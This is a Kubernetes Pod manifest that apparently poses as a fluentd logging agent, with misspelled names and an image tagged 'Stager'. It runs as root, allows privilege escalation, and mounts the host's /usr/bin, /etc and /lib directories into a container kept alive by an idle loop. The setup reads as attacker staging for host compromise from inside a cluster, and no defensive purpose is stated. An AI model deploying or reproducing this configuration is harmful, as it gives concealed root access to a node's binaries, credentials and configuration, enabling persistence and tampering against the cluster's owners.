apiVersion: v1
kind: Pod
metadata:
  name: flnued
spec:
  securityContext:
    runAsUser: 0
  containers:
    - name: k8fluend
      image: eu.gcr.io/quickstart-1549448731427/onering:v10-Stager_04
      command: ["/bin/sh"]
      args: ["-c", "while true; sleep 10; do echo 'tool'; done"]
      securityContext:
        allowPrivilegeEscalation: true
      volumeMounts:
        - name: fluend
          mountPath: /bin4u
        - name: fluend8
          mountPath: /etc4u
        - name: fluent
          mountPath: /lib4u
  volumes:
  - name: fluend
    hostPath:
      path: /usr/bin
  - name: fluend8
    hostPath:
      path: /etc
  - name: fluent
    hostPath:
      path: /lib



